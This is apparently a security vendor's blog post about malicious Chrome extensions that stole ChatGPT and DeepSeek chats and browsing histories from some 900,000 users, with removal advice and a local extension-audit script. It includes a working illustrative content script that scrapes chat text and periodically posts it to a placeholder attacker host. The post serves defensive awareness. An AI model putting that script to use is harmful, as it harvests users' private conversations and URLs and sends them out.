Malicious Chrome Extensions Steal ChatGPT and DeepSeek Conversations from 900K Users
Security researchers have uncovered a malicious browser extension campaign on the Chrome Web Store that has compromised more than 900,000 users by secretly exfiltrating ChatGPT and DeepSeek conversations, along with full browsing histories, to attacker-controlled servers.
How the compromise works
Researchers from OX Security found two extensions designed to mimic legitimate AI chat tools:
Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI — over 600,000 installs and previously carrying a Google “Featured” badge
AI Sidebar with Deepseek, ChatGPT, Claude and more — over 300,000 installs
Once installed, these extensions request permissions that allow them to monitor browser tabs and DOM elements on sites hosting AI chat sessions. They then collect:
chat prompts and responses from ChatGPT and DeepSeek
full URLs and browsing activity
session metadata
Collected data is encoded and sent to command-and-control servers approximately every 30 minutes, exposing corporate intellectual property, business strategies, personally identifiable information, and sensitive internal URLs.
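The published reports do not include the extensions' source code, so the following is only a minimal, generic sketch of the behavior described above: a content script that watches a chat page's DOM and periodically posts encoded data to a remote endpoint. The endpoint URL, DOM handling, and interval constant are illustrative placeholders, included to help defenders recognize this class of behavior rather than to reproduce the actual malware.

```typescript
// Illustrative sketch only. NOT recovered extension code; the endpoint,
// selectors, and constants below are hypothetical placeholders.
const EXFIL_ENDPOINT = "https://attacker.example/collect"; // hypothetical C2 URL
const FLUSH_INTERVAL_MS = 30 * 60 * 1000;                  // ~30-minute cadence reported

const buffer: string[] = [];

// Watch the chat transcript for newly rendered prompt/response nodes.
const observer = new MutationObserver((mutations) => {
  for (const m of mutations) {
    for (const node of m.addedNodes) {
      if (node instanceof HTMLElement) {
        buffer.push(node.innerText);
      }
    }
  }
});
observer.observe(document.body, { childList: true, subtree: true });

// Periodically encode the collected text plus page metadata and ship it out.
setInterval(() => {
  if (buffer.length === 0) return;
  const payload = btoa(
    encodeURIComponent(
      JSON.stringify({ url: location.href, messages: buffer.splice(0, buffer.length) })
    )
  );
  void fetch(EXFIL_ENDPOINT, { method: "POST", body: payload });
}, FLUSH_INTERVAL_MS);
```

In practice this kind of script only runs on pages the extension's host permissions cover, which is why broad host permissions on AI chat domains are a key warning sign.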
Why this matters
The stolen data can be leveraged for:
corporate espionage
targeted phishing attacks
identity theft
sale on underground markets
The fact that one of the extensions carried a Google “Featured” badge shows that even seemingly vetted software can pose a risk.
User guidance
Security professionals recommend:
removing the identified malicious extensions immediately
auditing all installed extensions and their permissions (a basic audit sketch follows this list)
avoiding AI chat extensions from unknown publishers
using official web interfaces for AI services
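As a starting point for that audit, the sketch below enumerates locally installed Chrome extensions and flags broad permissions worth reviewing. It assumes a Linux machine with Chrome's default profile location and a Node.js/TypeScript environment; neither assumption comes from the sources, so adjust the path for macOS or Windows profiles.

```typescript
// Minimal audit sketch: list installed Chrome extensions and flag broad permissions.
// Assumptions: Linux, default Chrome profile, Node.js 18+ (run with ts-node or compile first).
import { readdirSync, readFileSync } from "node:fs";
import { join } from "node:path";
import { homedir } from "node:os";

// Default Chrome extensions directory on Linux; adjust for other OSes or profiles.
const EXT_DIR = join(homedir(), ".config/google-chrome/Default/Extensions");

// Permissions that deserve a closer look when combined with an AI "sidebar" extension.
const RISKY = new Set(["tabs", "scripting", "webRequest", "history", "<all_urls>"]);

for (const extId of readdirSync(EXT_DIR)) {
  for (const version of readdirSync(join(EXT_DIR, extId))) {
    let manifest: any;
    try {
      manifest = JSON.parse(readFileSync(join(EXT_DIR, extId, version, "manifest.json"), "utf8"));
    } catch {
      continue; // not every subfolder contains a readable manifest
    }
    const perms: string[] = [
      ...(manifest.permissions ?? []),
      ...(manifest.host_permissions ?? []),
    ];
    const flagged = perms.filter((p) => RISKY.has(p) || p.includes("://*/"));
    // Localized names show up as "__MSG_...__" placeholders; the ID is the stable identifier.
    console.log(`${manifest.name ?? extId} (${extId})`);
    console.log(`  permissions: ${perms.join(", ") || "none"}`);
    if (flagged.length > 0) console.log(`  review: ${flagged.join(", ")}`);
  }
}
```

Extensions flagged here are not necessarily malicious; the output is simply a shortlist for manual review against the publisher, install source, and whether the permission breadth matches the stated purpose.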
DIAMATIX Perspective
DIAMATIX notes that incidents like this underline the growing risk of sensitive data exposure when AI tools and browser extensions are used without sufficient security controls.
As part of our LLM Security 101 series, we examine key threats related to enterprise AI usage, including malicious extensions, prompt injection attacks, and uncontrolled data leakage, alongside practical guidance for safer AI adoption.
LLM SECURITY 101 — PART 1: Understanding the Basics & Key Early Risks
LLM SECURITY 101 — PART 2: Advanced Risks and Practical Safeguards for Everyday AI Use
Trusted · Innovative · Vigilant
Sources:
The Hacker News, Cybersecurity News, Cybernews